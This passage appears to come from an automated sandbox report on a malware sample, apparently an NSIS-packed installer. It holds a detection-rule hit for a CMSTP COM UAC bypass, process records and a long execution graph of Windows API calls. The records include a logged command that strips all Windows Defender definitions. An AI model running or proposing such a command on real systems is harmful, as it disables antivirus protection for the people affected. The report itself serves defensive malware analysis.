                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:68
                                                                                                                                                                                                                                Start time:16:41:36
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                File size:496'640 bytes
                                                                                                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:69
                                                                                                                                                                                                                                Start time:16:41:41
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                Imagebase:0x7ff7ecad0000
                                                                                                                                                                                                                                File size:468'120 bytes
                                                                                                                                                                                                                                MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:18.5%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:16.6%
                                                                                                                                                                                                                                  Total number of Nodes:1375
                                                                                                                                                                                                                                  Total number of Limit Nodes:24
                                                                                                                                                                                                                                  execution_graph 3385 4015c1 3405 402d3e 3385->3405 3388 405d5b 4 API calls 3400 4015d1 3388->3400 3389 401631 3391 401663 3389->3391 3392 401636 3389->3392 3390 405cdd CharNextW 3390->3400 3395 401423 24 API calls 3391->3395 3411 401423 3392->3411 3401 40165b 3395->3401 3399 40164a SetCurrentDirectoryW 3399->3401 3400->3389 3400->3390 3402 401617 GetFileAttributesW 3400->3402 3404 4015fa 3400->3404 3415 4059ac 3400->3415 3423 40598f CreateDirectoryW 3400->3423 3402->3400 3404->3400 3418 405912 CreateDirectoryW 3404->3418 3406 402d4a 3405->3406 3407 406418 17 API calls 3406->3407 3408 402d6b 3407->3408 3409 4015c8 3408->3409 3410 40668a 5 API calls 3408->3410 3409->3388 3410->3409 3412 405443 24 API calls 3411->3412 3413 401431 3412->3413 3414 4063db lstrcpynW 3413->3414 3414->3399 3426 4067d0 GetModuleHandleA 3415->3426 3419 405963 GetLastError 3418->3419 3420 40595f 3418->3420 3419->3420 3421 405972 SetFileSecurityW 3419->3421 3420->3404 3421->3420 3422 405988 GetLastError 3421->3422 3422->3420 3424 4059a3 GetLastError 3423->3424 3425 40599f 3423->3425 3424->3425 3425->3400 3427 4067f6 GetProcAddress 3426->3427 3428 4067ec 3426->3428 3430 4059b3 3427->3430 3432 406760 GetSystemDirectoryW 3428->3432 3430->3400 3431 4067f2 3431->3427 3431->3430 3433 406782 wsprintfW LoadLibraryExW 3432->3433 3433->3431 3972 402a42 3973 402d1c 17 API calls 3972->3973 3974 402a48 3973->3974 3975 402a88 3974->3975 3976 402a6f 3974->3976 3981 402925 3974->3981 3977 402aa2 3975->3977 3978 402a92 3975->3978 3979 402a74 3976->3979 3980 402a85 3976->3980 3983 406418 17 API calls 3977->3983 3982 402d1c 17 API calls 3978->3982 3986 4063db lstrcpynW 3979->3986 3987 406322 wsprintfW 3980->3987 3982->3981 3983->3981 3986->3981 3987->3981 3988 401c43 3989 402d1c 17 API calls 3988->3989 3990 401c4a 3989->3990 3991 402d1c 17 API calls 3990->3991 3992 401c57 3991->3992 3993 401c6c 3992->3993 3994 402d3e 17 API calls 3992->3994 3995 401c7c 3993->3995 3996 402d3e 17 API calls 3993->3996 3994->3993 3997 401cd3 3995->3997 3998 401c87 3995->3998 3996->3995 3999 402d3e 17 API calls 3997->3999 4000 402d1c 17 API calls 3998->4000 4001 401cd8 3999->4001 4002 401c8c 4000->4002 4003 402d3e 17 API calls 4001->4003 4004 402d1c 17 API calls 4002->4004 4005 401ce1 FindWindowExW 4003->4005 4006 401c98 4004->4006 4009 401d03 4005->4009 4007 401cc3 SendMessageW 4006->4007 4008 401ca5 SendMessageTimeoutW 4006->4008 4007->4009 4008->4009 4010 402b43 4011 4067d0 5 API calls 4010->4011 4012 402b4a 4011->4012 4013 402d3e 17 API calls 4012->4013 4014 402b53 4013->4014 4015 402b57 IIDFromString 4014->4015 4017 402b8e 4014->4017 4016 402b66 4015->4016 4015->4017 4016->4017 4020 4063db lstrcpynW 4016->4020 4019 402b83 CoTaskMemFree 4019->4017 4020->4019 4028 402947 4029 402d3e 17 API calls 4028->4029 4030 402955 4029->4030 4031 40296b 4030->4031 4032 402d3e 17 API calls 4030->4032 4033 405eac 2 API calls 4031->4033 4032->4031 4034 402971 4033->4034 4056 405ed1 GetFileAttributesW CreateFileW 4034->4056 4036 40297e 4037 402a21 4036->4037 4038 40298a GlobalAlloc 4036->4038 4041 402a29 DeleteFileW 4037->4041 4042 402a3c 4037->4042 4039 4029a3 4038->4039 4040 402a18 CloseHandle 4038->4040 4057 403447 SetFilePointer 4039->4057 4040->4037 4041->4042 4044 4029a9 4045 403431 ReadFile 4044->4045 4046 4029b2 GlobalAlloc 4045->4046 4047 4029c2 4046->4047 4048 4029f6 4046->4048 4049 40324c 35 API calls 4047->4049 4050 405f83 WriteFile 4048->4050 4055 4029cf 4049->4055 4051 402a02 GlobalFree 4050->4051 4052 40324c 35 API calls 4051->4052 4053 402a15 4052->4053 4053->4040 4054 4029ed GlobalFree 4054->4048 4055->4054 4056->4036 4057->4044 4061 4016cc 4062 402d3e 17 API calls 4061->4062 4063 4016d2 GetFullPathNameW 4062->4063 4064 40170e 4063->4064 4065 4016ec 4063->4065 4066 402bc2 4064->4066 4067 401723 GetShortPathNameW 4064->4067 4065->4064 4068 406739 2 API calls 4065->4068 4067->4066 4069 4016fe 4068->4069 4069->4064 4071 4063db lstrcpynW 4069->4071 4071->4064 4072 401e4e GetDC 4073 402d1c 17 API calls 4072->4073 4074 401e60 GetDeviceCaps MulDiv ReleaseDC 4073->4074 4075 402d1c 17 API calls 4074->4075 4076 401e91 4075->4076 4077 406418 17 API calls 4076->4077 4078 401ece CreateFontIndirectW 4077->4078 4079 402630 4078->4079 4080 402acf 4081 402d1c 17 API calls 4080->4081 4082 402ad5 4081->4082 4083 402b12 4082->4083 4084 402925 4082->4084 4086 402ae7 4082->4086 4083->4084 4085 406418 17 API calls 4083->4085 4085->4084 4086->4084 4088 406322 wsprintfW 4086->4088 4088->4084 3199 4039d0 3200 4039e8 3199->3200 3201 4039da FindCloseChangeNotification 3199->3201 3206 403a15 3200->3206 3201->3200 3207 403a23 3206->3207 3208 4039ed 3207->3208 3209 403a28 FreeLibrary GlobalFree 3207->3209 3210 405aed 3208->3210 3209->3208 3209->3209 3246 405db8 3210->3246 3213 405b15 DeleteFileW 3242 4039f9 3213->3242 3214 405b2c 3219 405c4c 3214->3219 3260 4063db lstrcpynW 3214->3260 3216 405b52 3217 405b65 3216->3217 3218 405b58 lstrcatW 3216->3218 3261 405cfc lstrlenW 3217->3261 3220 405b6b 3218->3220 3219->3242 3289 406739 FindFirstFileW 3219->3289 3223 405b7b lstrcatW 3220->3223 3225 405b86 lstrlenW FindFirstFileW 3220->3225 3223->3225 3225->3219 3244 405ba8 3225->3244 3228 405aa5 5 API calls 3231 405c87 3228->3231 3230 405c2f FindNextFileW 3232 405c45 FindClose 3230->3232 3230->3244 3233 405ca1 3231->3233 3234 405c8b 3231->3234 3232->3219 3236 405443 24 API calls 3233->3236 3237 405443 24 API calls 3234->3237 3234->3242 3236->3242 3239 405c98 3237->3239 3238 405aed 60 API calls 3238->3244 3241 4061a1 36 API calls 3239->3241 3240 405443 24 API calls 3240->3230 3241->3242 3244->3230 3244->3238 3244->3240 3265 4063db lstrcpynW 3244->3265 3266 405aa5 3244->3266 3274 405443 3244->3274 3285 4061a1 MoveFileExW 3244->3285 3295 4063db lstrcpynW 3246->3295 3248 405dc9 3296 405d5b CharNextW CharNextW 3248->3296 3251 405b0d 3251->3213 3251->3214 3253 405e10 lstrlenW 3254 405e1b 3253->3254 3258 405ddf 3253->3258 3256 405cb0 3 API calls 3254->3256 3255 406739 2 API calls 3255->3258 3257 405e20 GetFileAttributesW 3256->3257 3257->3251 3258->3251 3258->3253 3258->3255 3259 405cfc 2 API calls 3258->3259 3259->3253 3260->3216 3262 405d0a 3261->3262 3263 405d10 CharPrevW 3262->3263 3264 405d1c 3262->3264 3263->3262 3263->3264 3264->3220 3265->3244 3315 405eac GetFileAttributesW 3266->3315 3269 405ad2 3269->3244 3270 405ac0 RemoveDirectoryW 3272 405ace 3270->3272 3271 405ac8 DeleteFileW 3271->3272 3272->3269 3273 405ade SetFileAttributesW 3272->3273 3273->3269 3275 40545e 3274->3275 3276 405500 3274->3276 3277 40547a lstrlenW 3275->3277 3318 406418 3275->3318 3276->3244 3279 4054a3 3277->3279 3280 405488 lstrlenW 3277->3280 3282 4054b6 3279->3282 3283 4054a9 SetWindowTextW 3279->3283 3280->3276 3281 40549a lstrcatW 3280->3281 3281->3279 3282->3276 3284 4054bc SendMessageW SendMessageW SendMessageW 3282->3284 3283->3282 3284->3276 3286 4061c2 3285->3286 3287 4061b5 3285->3287 3286->3244 3347 406027 3287->3347 3290 405c71 3289->3290 3291 40674f FindClose 3289->3291 3290->3242 3292 405cb0 lstrlenW CharPrevW 3290->3292 3291->3290 3293 405c7b 3292->3293 3294 405ccc lstrcatW 3292->3294 3293->3228 3294->3293 3295->3248 3297 405d78 3296->3297 3299 405d8a 3296->3299 3298 405d85 CharNextW 3297->3298 3297->3299 3301 405dae 3298->3301 3299->3301 3311 405cdd 3299->3311 3301->3251 3302 40668a 3301->3302 3303 406697 3302->3303 3305 406700 CharNextW 3303->3305 3306 405cdd CharNextW 3303->3306 3307 40670d 3303->3307 3309 4066ec CharNextW 3303->3309 3310 4066fb CharNextW 3303->3310 3304 406712 CharPrevW 3304->3307 3305->3303 3305->3307 3306->3303 3307->3304 3308 406733 3307->3308 3308->3258 3309->3303 3310->3305 3312 405ce3 3311->3312 3313 405cf9 3312->3313 3314 405cea CharNextW 3312->3314 3313->3299 3314->3312 3316 405ab1 3315->3316 3317 405ebe SetFileAttributesW 3315->3317 3316->3269 3316->3270 3316->3271 3317->3316 3330 406425 3318->3330 3319 406670 3320 406686 3319->3320 3342 4063db lstrcpynW 3319->3342 3320->3277 3322 40663e lstrlenW 3322->3330 3325 406418 10 API calls 3325->3322 3326 406553 GetSystemDirectoryW 3326->3330 3328 406566 GetWindowsDirectoryW 3328->3330 3329 40668a 5 API calls 3329->3330 3330->3319 3330->3322 3330->3325 3330->3326 3330->3328 3330->3329 3331 40659a SHGetSpecialFolderLocation 3330->3331 3332 406418 10 API calls 3330->3332 3333 4065e1 lstrcatW 3330->3333 3335 4062a9 3330->3335 3340 406322 wsprintfW 3330->3340 3341 4063db lstrcpynW 3330->3341 3331->3330 3334 4065b2 SHGetPathFromIDListW CoTaskMemFree 3331->3334 3332->3330 3333->3330 3334->3330 3343 406248 3335->3343 3338 40630d 3338->3330 3339 4062dd RegQueryValueExW RegCloseKey 3339->3338 3340->3330 3341->3330 3342->3320 3344 406257 3343->3344 3345 406260 RegOpenKeyExW 3344->3345 3346 40625b 3344->3346 3345->3346 3346->3338 3346->3339 3348 406057 3347->3348 3349 40607d GetShortPathNameW 3347->3349 3374 405ed1 GetFileAttributesW CreateFileW 3348->3374 3351 406092 3349->3351 3352 40619c 3349->3352 3351->3352 3354 40609a wsprintfA 3351->3354 3352->3286 3353 406061 CloseHandle GetShortPathNameW 3353->3352 3355 406075 3353->3355 3356 406418 17 API calls 3354->3356 3355->3349 3355->3352 3357 4060c2 3356->3357 3375 405ed1 GetFileAttributesW CreateFileW 3357->3375 3359 4060cf 3359->3352 3360 4060de GetFileSize GlobalAlloc 3359->3360 3361 406100 3360->3361 3362 406195 CloseHandle 3360->3362 3376 405f54 ReadFile 3361->3376 3362->3352 3367 406133 3370 405e36 4 API calls 3367->3370 3368 40611f lstrcpyA 3369 406141 3368->3369 3371 406178 SetFilePointer 3369->3371 3370->3369 3383 405f83 WriteFile 3371->3383 3374->3353 3375->3359 3377 405f72 3376->3377 3377->3362 3378 405e36 lstrlenA 3377->3378 3379 405e77 lstrlenA 3378->3379 3380 405e50 lstrcmpiA 3379->3380 3381 405e7f 3379->3381 3380->3381 3382 405e6e CharNextA 3380->3382 3381->3367 3381->3368 3382->3379 3384 405fa1 GlobalFree 3383->3384 3384->3362 4089 4020d0 4090 4020e2 4089->4090 4091 402194 4089->4091 4092 402d3e 17 API calls 4090->4092 4094 401423 24 API calls 4091->4094 4093 4020e9 4092->4093 4095 402d3e 17 API calls 4093->4095 4099 4022ee 4094->4099 4096 4020f2 4095->4096 4097 402108 LoadLibraryExW 4096->4097 4098 4020fa GetModuleHandleW 4096->4098 4097->4091 4100 402119 4097->4100 4098->4097 4098->4100 4109 40683f 4100->4109 4103 402163 4105 405443 24 API calls 4103->4105 4104 40212a 4106 401423 24 API calls 4104->4106 4107 40213a 4104->4107 4105->4107 4106->4107 4107->4099 4108 402186 FreeLibrary 4107->4108 4108->4099 4114 4063fd WideCharToMultiByte 4109->4114 4111 40685c 4112 406863 GetProcAddress 4111->4112 4113 402124 4111->4113 4112->4113 4113->4103 4113->4104 4114->4111 4115 4028d5 4116 4028dd 4115->4116 4117 4028e1 FindNextFileW 4116->4117 4119 4028f3 4116->4119 4118 40293a 4117->4118 4117->4119 4121 4063db lstrcpynW 4118->4121 4121->4119 4122 401956 4123 402d3e 17 API calls 4122->4123 4124 40195d lstrlenW 4123->4124 4125 402630 4124->4125 4126 4014d7 4127 402d1c 17 API calls 4126->4127 4128 4014dd Sleep 4127->4128 4130 402bc2 4128->4130 3544 403e58 3545 403e70 3544->3545 3546 403fab 3544->3546 3545->3546 3547 403e7c 3545->3547 3548 403ffc 3546->3548 3549 403fbc GetDlgItem GetDlgItem 3546->3549 3550 403e87 SetWindowPos 3547->3550 3551 403e9a 3547->3551 3553 404056 3548->3553 3561 401389 2 API calls 3548->3561 3552 404331 18 API calls 3549->3552 3550->3551 3554 403eb7 3551->3554 3555 403e9f ShowWindow 3551->3555 3556 403fe6 SetClassLongW 3552->3556 3557 40437d SendMessageW 3553->3557 3606 403fa6 3553->3606 3558 403ed9 3554->3558 3559 403ebf DestroyWindow 3554->3559 3555->3554 3560 40140b 2 API calls 3556->3560 3604 404068 3557->3604 3562 403ede SetWindowLongW 3558->3562 3563 403eef 3558->3563 3614 4042ba 3559->3614 3560->3548 3564 40402e 3561->3564 3562->3606 3567 403f98 3563->3567 3568 403efb GetDlgItem 3563->3568 3564->3553 3569 404032 SendMessageW 3564->3569 3565 40140b 2 API calls 3565->3604 3566 4042bc DestroyWindow KiUserCallbackDispatcher 3566->3614 3573 404398 8 API calls 3567->3573 3571 403f2b 3568->3571 3572 403f0e SendMessageW IsWindowEnabled 3568->3572 3569->3606 3570 4042eb ShowWindow 3570->3606 3575 403f38 3571->3575 3576 403f4b 3571->3576 3577 403f7f SendMessageW 3571->3577 3585 403f30 3571->3585 3572->3571 3572->3606 3573->3606 3574 406418 17 API calls 3574->3604 3575->3577 3575->3585 3580 403f53 3576->3580 3581 403f68 3576->3581 3577->3567 3578 40430a SendMessageW 3582 403f66 3578->3582 3579 404331 18 API calls 3579->3604 3621 40140b 3580->3621 3584 40140b 2 API calls 3581->3584 3582->3567 3586 403f6f 3584->3586 3585->3578 3586->3567 3586->3585 3587 404331 18 API calls 3588 4040e3 GetDlgItem 3587->3588 3589 404100 ShowWindow KiUserCallbackDispatcher 3588->3589 3590 4040f8 3588->3590 3615 404353 KiUserCallbackDispatcher 3589->3615 3590->3589 3592 40412a EnableWindow 3597 40413e 3592->3597 3593 404143 GetSystemMenu EnableMenuItem SendMessageW 3594 404173 SendMessageW 3593->3594 3593->3597 3594->3597 3597->3593 3616 404366 SendMessageW 3597->3616 3617 403e39 3597->3617 3620 4063db lstrcpynW 3597->3620 3599 4041a2 lstrlenW 3600 406418 17 API calls 3599->3600 3601 4041b8 SetWindowTextW 3600->3601 3602 401389 2 API calls 3601->3602 3602->3604 3603 4041fc DestroyWindow 3605 404216 CreateDialogParamW 3603->3605 3603->3614 3604->3565 3604->3566 3604->3574 3604->3579 3604->3587 3604->3603 3604->3606 3607 404249 3605->3607 3605->3614 3608 404331 18 API calls 3607->3608 3609 404254 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3608->3609 3610 401389 2 API calls 3609->3610 3611 40429a 3610->3611 3611->3606 3612 4042a2 ShowWindow 3611->3612 3613 40437d SendMessageW 3612->3613 3613->3614 3614->3570 3614->3606 3615->3592 3616->3597 3618 406418 17 API calls 3617->3618 3619 403e47 SetWindowTextW 3618->3619 3619->3597 3620->3599 3622 401389 2 API calls 3621->3622 3623 401420 3622->3623 3623->3585 4131 4047db 4132 404811 4131->4132 4133 4047eb 4131->4133 4135 404398 8 API calls 4132->4135 4134 404331 18 API calls 4133->4134 4136 4047f8 SetDlgItemTextW 4134->4136 4137 40481d 4135->4137 4136->4132 3651 40175c 3652 402d3e 17 API calls 3651->3652 3653 401763 3652->3653 3657 405f00 3653->3657 3655 40176a 3656 405f00 2 API calls 3655->3656 3656->3655 3658 405f0d GetTickCount GetTempFileNameW 3657->3658 3659 405f43 3658->3659 3660 405f47 3658->3660 3659->3658 3659->3660 3660->3655 4138 401d5d 4139 402d1c 17 API calls 4138->4139 4140 401d6e SetWindowLongW 4139->4140 4141 402bc2 4140->4141 3661 401ede 3669 402d1c 3661->3669 3663 401ee4 3664 402d1c 17 API calls 3663->3664 3665 401ef0 3664->3665 3666 401f07 EnableWindow 3665->3666 3667 401efc ShowWindow 3665->3667 3668 402bc2 3666->3668 3667->3668 3670 406418 17 API calls 3669->3670 3671 402d31 3670->3671 3671->3663 4149 401563 4150 402b08 4149->4150 4153 406322 wsprintfW 4150->4153 4152 402b0d 4153->4152 4154 4026e4 4155 402d1c 17 API calls 4154->4155 4156 4026f3 4155->4156 4157 40273d ReadFile 4156->4157 4158 405f54 ReadFile 4156->4158 4159 402832 4156->4159 4160 40277d MultiByteToWideChar 4156->4160 4163 4027a3 SetFilePointer MultiByteToWideChar 4156->4163 4164 402843 4156->4164 4166 402830 4156->4166 4167 405fb2 SetFilePointer 4156->4167 4157->4156 4157->4166 4158->4156 4176 406322 wsprintfW 4159->4176 4160->4156 4163->4156 4165 402864 SetFilePointer 4164->4165 4164->4166 4165->4166 4168 405fce 4167->4168 4171 405fe6 4167->4171 4169 405f54 ReadFile 4168->4169 4170 405fda 4169->4170 4170->4171 4172 406017 SetFilePointer 4170->4172 4173 405fef SetFilePointer 4170->4173 4171->4156 4172->4171 4173->4172 4174 405ffa 4173->4174 4175 405f83 WriteFile 4174->4175 4175->4171 4176->4166 4177 404467 lstrcpynW lstrlenW 4178 401968 4179 402d1c 17 API calls 4178->4179 4180 40196f 4179->4180 4181 402d1c 17 API calls 4180->4181 4182 40197c 4181->4182 4183 402d3e 17 API calls 4182->4183 4184 401993 lstrlenW 4183->4184 4186 4019a4 4184->4186 4185 4019e5 4186->4185 4190 4063db lstrcpynW 4186->4190 4188 4019d5 4188->4185 4189 4019da lstrlenW 4188->4189 4189->4185 4190->4188 4191 403a68 4192 403a73 4191->4192 4193 403a7a GlobalAlloc 4192->4193 4194 403a77 4192->4194 4193->4194 4195 40166a 4196 402d3e 17 API calls 4195->4196 4197 401670 4196->4197 4198 406739 2 API calls 4197->4198 4199 401676 4198->4199 4200 4023ec 4201 402d3e 17 API calls 4200->4201 4202 4023fb 4201->4202 4203 402d3e 17 API calls 4202->4203 4204 402404 4203->4204 4205 402d3e 17 API calls 4204->4205 4206 40240e GetPrivateProfileStringW 4205->4206 3672 40176f 3673 402d3e 17 API calls 3672->3673 3674 401776 3673->3674 3675 401796 3674->3675 3676 40179e 3674->3676 3732 4063db lstrcpynW 3675->3732 3733 4063db lstrcpynW 3676->3733 3679 40179c 3683 40668a 5 API calls 3679->3683 3680 4017a9 3681 405cb0 3 API calls 3680->3681 3682 4017af lstrcatW 3681->3682 3682->3679 3687 4017bb 3683->3687 3684 406739 2 API calls 3684->3687 3685 405eac 2 API calls 3685->3687 3687->3684 3687->3685 3688 4017cd CompareFileTime 3687->3688 3689 40188d 3687->3689 3692 4063db lstrcpynW 3687->3692 3698 406418 17 API calls 3687->3698 3704 405a41 MessageBoxIndirectW 3687->3704 3707 401864 3687->3707 3710 405ed1 GetFileAttributesW CreateFileW 3687->3710 3688->3687 3690 405443 24 API calls 3689->3690 3693 401897 3690->3693 3691 405443 24 API calls 3709 401879 3691->3709 3692->3687 3711 40324c 3693->3711 3696 4018be SetFileTime 3697 4018d0 FindCloseChangeNotification 3696->3697 3699 4018e1 3697->3699 3697->3709 3698->3687 3700 4018e6 3699->3700 3701 4018f9 3699->3701 3702 406418 17 API calls 3700->3702 3703 406418 17 API calls 3701->3703 3705 4018ee lstrcatW 3702->3705 3706 401901 3703->3706 3704->3687 3705->3706 3708 405a41 MessageBoxIndirectW 3706->3708 3707->3691 3707->3709 3708->3709 3710->3687 3713 403265 3711->3713 3712 403290 3734 403431 3712->3734 3713->3712 3744 403447 SetFilePointer 3713->3744 3717 4033d1 3719 4033d5 3717->3719 3723 4033ed 3717->3723 3718 4032ad GetTickCount 3730 4032c0 3718->3730 3721 403431 ReadFile 3719->3721 3720 4018aa 3720->3696 3720->3697 3721->3720 3722 403431 ReadFile 3722->3723 3723->3720 3723->3722 3725 405f83 WriteFile 3723->3725 3724 403431 ReadFile 3724->3730 3725->3723 3727 403326 GetTickCount 3727->3730 3728 40334f MulDiv wsprintfW 3729 405443 24 API calls 3728->3729 3729->3730 3730->3720 3730->3724 3730->3727 3730->3728 3731 405f83 WriteFile 3730->3731 3737 40694b 3730->3737 3731->3730 3732->3679 3733->3680 3735 405f54 ReadFile 3734->3735 3736 40329b 3735->3736 3736->3717 3736->3718 3736->3720 3738 406970 3737->3738 3739 406978 3737->3739 3738->3730 3739->3738 3740 406a08 GlobalAlloc 3739->3740 3741 4069ff GlobalFree 3739->3741 3742 406a76 GlobalFree 3739->3742 3743 406a7f GlobalAlloc 3739->3743 3740->3738 3740->3739 3741->3740 3742->3743 3743->3738 3743->3739 3744->3712 4214 4044f0 4215 404508 4214->4215 4218 404622 4214->4218 4219 404331 18 API calls 4215->4219 4216 40468c 4217 404696 GetDlgItem 4216->4217 4220 404756 4216->4220 4221 4046b0 4217->4221 4222 404717 4217->4222 4218->4216 4218->4220 4223 40465d GetDlgItem SendMessageW 4218->4223 4224 40456f 4219->4224 4225 404398 8 API calls 4220->4225 4221->4222 4227 4046d6 SendMessageW LoadCursorW SetCursor 4221->4227 4222->4220 4228 404729 4222->4228 4247 404353 KiUserCallbackDispatcher 4223->4247 4230 404331 18 API calls 4224->4230 4226 404751 4225->4226 4251 40479f 4227->4251 4232 40473f 4228->4232 4233 40472f SendMessageW 4228->4233 4235 40457c CheckDlgButton 4230->4235 4232->4226 4237 404745 SendMessageW 4232->4237 4233->4232 4234 404687 4248 40477b 4234->4248 4245 404353 KiUserCallbackDispatcher 4235->4245 4237->4226 4240 40459a GetDlgItem 4246 404366 SendMessageW 4240->4246 4242 4045b0 SendMessageW 4243 4045d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4242->4243 4244 4045cd GetSysColor 4242->4244 4243->4226 4244->4243 4245->4240 4246->4242 4247->4234 4249 404789 4248->4249 4250 40478e SendMessageW 4248->4250 4249->4250 4250->4216 4254 405a07 ShellExecuteExW 4251->4254 4253 404705 LoadCursorW SetCursor 4253->4222 4254->4253 4255 401a72 4256 402d1c 17 API calls 4255->4256 4257 401a7b 4256->4257 4258 402d1c 17 API calls 4257->4258 4259 401a20 4258->4259 4260 401573 4261 401583 ShowWindow 4260->4261 4262 40158c 4260->4262 4261->4262 4263 402bc2 4262->4263 4264 40159a ShowWindow 4262->4264 4264->4263 4265 4014f5 SetForegroundWindow 4266 402bc2 4265->4266 4267 401ff6 4268 402d3e 17 API calls 4267->4268 4269 401ffd 4268->4269 4270 406739 2 API calls 4269->4270 4271 402003 4270->4271 4273 402014 4271->4273 4274 406322 wsprintfW 4271->4274 4274->4273 4275 401b77 4276 402d3e 17 API calls 4275->4276 4277 401b7e 4276->4277 4278 402d1c 17 API calls 4277->4278 4279 401b87 wsprintfW 4278->4279 4280 402bc2 4279->4280 4281 4022f7 4282 402d3e 17 API calls 4281->4282 4283 4022fd 4282->4283 4284 402d3e 17 API calls 4283->4284 4285 402306 4284->4285 4286 402d3e 17 API calls 4285->4286 4287 40230f 4286->4287 4288 406739 2 API calls 4287->4288 4289 402318 4288->4289 4290 402329 lstrlenW lstrlenW 4289->4290 4291 40231c 4289->4291 4293 405443 24 API calls 4290->4293 4292 405443 24 API calls 4291->4292 4294 402324 4291->4294 4292->4294 4295 402367 SHFileOperationW 4293->4295 4295->4291 4295->4294 4296 404b78 4297 404ba4 4296->4297 4298 404b88 4296->4298 4300 404bd7 4297->4300 4301 404baa SHGetPathFromIDListW 4297->4301 4307 405a25 GetDlgItemTextW 4298->4307 4303 404bc1 SendMessageW 4301->4303 4304 404bba 4301->4304 4302 404b95 SendMessageW 4302->4297 4303->4300 4306 40140b 2 API calls 4304->4306 4306->4303 4307->4302 4308 406afa 4309 40697e 4308->4309 4310 4072e9 4309->4310 4311 406a08 GlobalAlloc 4309->4311 4312 4069ff GlobalFree 4309->4312 4313 406a76 GlobalFree 4309->4313 4314 406a7f GlobalAlloc 4309->4314 4311->4309 4311->4310 4312->4311 4313->4314 4314->4309 4314->4310 4315 40167b 4316 402d3e 17 API calls 4315->4316 4317 401682 4316->4317 4318 402d3e 17 API calls 4317->4318 4319 40168b 4318->4319 4320 402d3e 17 API calls 4319->4320 4321 401694 MoveFileW 4320->4321 4322 4016a7 4321->4322 4328 4016a0 4321->4328 4323 406739 2 API calls 4322->4323 4325 4022ee 4322->4325 4326 4016b6 4323->4326 4324 401423 24 API calls 4324->4325 4326->4325 4327 4061a1 36 API calls 4326->4327 4327->4328 4328->4324 4329 40237b 4330 402382 4329->4330 4331 402395 4329->4331 4332 406418 17 API calls 4330->4332 4333 40238f 4332->4333 4334 405a41 MessageBoxIndirectW 4333->4334 4334->4331 4335 4019ff 4336 402d3e 17 API calls 4335->4336 4337 401a06 4336->4337 4338 402d3e 17 API calls 4337->4338 4339 401a0f 4338->4339 4340 401a16 lstrcmpiW 4339->4340 4341 401a28 lstrcmpW 4339->4341 4342 401a1c 4340->4342 4341->4342 4343 401000 4344 401037 BeginPaint GetClientRect 4343->4344 4345 40100c DefWindowProcW 4343->4345 4347 4010f3 4344->4347 4348 401179 4345->4348 4349 401073 CreateBrushIndirect FillRect DeleteObject 4347->4349 4350 4010fc 4347->4350 4349->4347 4351 401102 CreateFontIndirectW 4350->4351 4352 401167 EndPaint 4350->4352 4351->4352 4353 401112 6 API calls 4351->4353 4352->4348 4353->4352 4354 401d81 4355 401d94 GetDlgItem 4354->4355 4356 401d87 4354->4356 4358 401d8e 4355->4358 4357 402d1c 17 API calls 4356->4357 4357->4358 4359 401dd5 GetClientRect LoadImageW SendMessageW 4358->4359 4360 402d3e 17 API calls 4358->4360 4362 401e33 4359->4362 4364 401e3f 4359->4364 4360->4359 4363 401e38 DeleteObject 4362->4363 4362->4364 4363->4364 3435 405582 3436 4055a3 GetDlgItem GetDlgItem GetDlgItem 3435->3436 3437 40572c 3435->3437 3480 404366 SendMessageW 3436->3480 3439 405735 GetDlgItem CreateThread FindCloseChangeNotification 3437->3439 3440 40575d 3437->3440 3439->3440 3503 405516 OleInitialize 3439->3503 3442 405788 3440->3442 3443 405774 ShowWindow ShowWindow 3440->3443 3444 4057ad 3440->3444 3441 405613 3446 40561a GetClientRect GetSystemMetrics SendMessageW SendMessageW 3441->3446 3445 4057e8 3442->3445 3448 4057c2 ShowWindow 3442->3448 3449 40579c 3442->3449 3485 404366 SendMessageW 3443->3485 3489 404398 3444->3489 3445->3444 3453 4057f6 SendMessageW 3445->3453 3451 405688 3446->3451 3452 40566c SendMessageW SendMessageW 3446->3452 3456 4057e2 3448->3456 3457 4057d4 3448->3457 3486 40430a 3449->3486 3460 40569b 3451->3460 3461 40568d SendMessageW 3451->3461 3452->3451 3455 4057bb 3453->3455 3462 40580f CreatePopupMenu 3453->3462 3459 40430a SendMessageW 3456->3459 3458 405443 24 API calls 3457->3458 3458->3456 3459->3445 3481 404331 3460->3481 3461->3460 3463 406418 17 API calls 3462->3463 3465 40581f AppendMenuW 3463->3465 3467 40583c GetWindowRect 3465->3467 3468 40584f TrackPopupMenu 3465->3468 3466 4056ab 3469 4056b4 ShowWindow 3466->3469 3470 4056e8 GetDlgItem SendMessageW 3466->3470 3467->3468 